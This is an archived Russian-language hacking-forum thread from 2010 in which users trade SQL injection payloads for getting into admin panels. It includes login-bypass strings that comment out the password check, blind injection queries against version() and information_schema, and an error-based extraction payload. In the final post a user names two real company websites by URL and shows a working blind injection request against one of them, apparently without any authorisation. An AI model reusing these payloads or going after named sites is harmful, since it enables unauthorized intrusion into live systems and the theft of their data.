ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
16.03.2010, 22:53
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
Сообщение от попугай
select * from users where login='admin' or 1='1' and passwd='202cb962ac59075b964b07152d234b70'
Можно в админку попасть тут?
поидее да, если пароль верный, и админ первый в таблице. А закомментить строку так можно?
Код:
select * from users where login='admin' or 1=1+--+'
если да, то зайдёшь под логином первого из результата select * from users (обычно админ)
|
|
|
16.03.2010, 22:59
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от Seravin
поидее да, если пароль верный, и админ первый в таблице. А закомментить строку так можно?
Код:
select * from users where login='admin' or 1=1+--+'
если да, то зайдёшь под логином первого из результата select * from users (обычно админ)
Да, комменты я пробовал - не получалось. Неправильно делал.
Я забыл про закрывающую кавычку и камент, сделал так
select * from users where login=' admin' or 1='1' -- and passwd='202cb962ac59075b964b07152d234b70'
пустило.
|
|
|
|
16.03.2010, 23:14
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
Сообщение от попугай
Да, комменты я пробовал - не получалось. Неправильно делал.
Я забыл про закрывающую кавычку и камент, сделал так
select * from users where login='admin' or 1='1' -- and passwd='202cb962ac59075b964b07152d234b70'
пустило.
# еще можна использовать, если используеться гет, то перевести в 16-ную...
Последний раз редактировалось Strilo4ka; 17.03.2010 в 02:11..
|
|
|
|
16.03.2010, 22:54
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Сообщение от попугай
select * from users where login='admin' or 1='1' and passwd='202cb962ac59075b964b07152d234b70'
Можно в админку попасть тут?
select * from users where login='admin ' or 1=1/* ' and passwd='202cb962ac59075b964b07152d234b70'
Точно не уверен,попробуй
|
|
|
|
17.03.2010, 03:14
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
на одном сайте есть уязвимость но все метады уже проверил не какой не идет.. проходит тока этот +AND+ascii(substring(version(),1,1))>117/* а так не идет +AND+ascii(substring((select+table_name+from+infor mation_schema.tables),1,1))>117/* как дальше продолжеть?
так тоже пробовал or(select+count(*)from(information_schema.columns)/**/group/**/by/**/concat(table_name,floor(rand(0)*2))/**/limit/**/1,1)/* ...
|
|
|
|
17.03.2010, 03:26
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
Сообщение от [Feldmarschall]
на одном сайте есть уязвимость но все метады уже проверил не какой не идет.. проходит тока этот +AND+ascii(substring(version(),1,1))>117/* а так не идет +AND+ascii(substring((select+table_name+from+infor mation_schema.tables),1,1))>117/* как дальше продолжеть?
так тоже пробовал or(select+count(*)from(information_schema.columns)/**/group/**/by/**/concat(table_name,floor(rand(0)*2))/**/limit/**/1,1)/* ...
может схемы просто нет (ветка ниже) или код символа ниже возьми...
скрипт (нижний пост) заюзай хоть и на пхп или другой инструмент возьми, если слепая.
Последний раз редактировалось Strilo4ka; 17.03.2010 в 03:39..
|
|
|
|
17.03.2010, 18:17
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
там внизу под ошибкой sql стоит
[XT SQL Error]
что это??
и ище очень часто я встречяюсь с этим
You have an error in your SQL syntax;...................
[TEP STOP]
и разкрутить вроде неразу не удалось.. что это может быть?
|
|
|
|
23.03.2010, 21:17
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
Что значет есле при выходе SQL injection в низу написанно
[XT SQL Error]
что это??
и ище очень часто я встречяюсь с этим
типа You have an error in your SQL syntax;...................
[TEP STOP]
и разкрутить неразу не удалось.. что это может быть?
HELP !"
|
|
|
|
17.03.2010, 18:38
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
объясни что знaчит проходит и нe проходит, т.к. пeрвый зaпрос должeн дaть пустой рeзультaт
|
|
|
|
17.03.2010, 20:34
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
Ну смотрим кто что скажет...
http://azone-it.ru/index.php?option=com_content&task=view&id=30&Itemi d=52'
выпригует алерт с ошибкой выполнения запроса (логирования)...
самое интересное что это компания которая проводит аудит безопасности 
И вот тоже как блинд крутить можно ...
http://www.lins-m.ru/index.php?ID=51+and+5=(select%20version())--+
О компании
Компания «ЛИНС-М» предлагает следующий перечень профессиональных услуг для обеспечения безопасности ИС организаций
с юнион мну не получилось...
Последний раз редактировалось Strilo4ka; 17.03.2010 в 20:47..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1988196){kind=avatar}
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?1988783){kind=avatar}
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?1990087){kind=avatar}
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2006322){kind=avatar}
Похожие темы
Комбинированный вид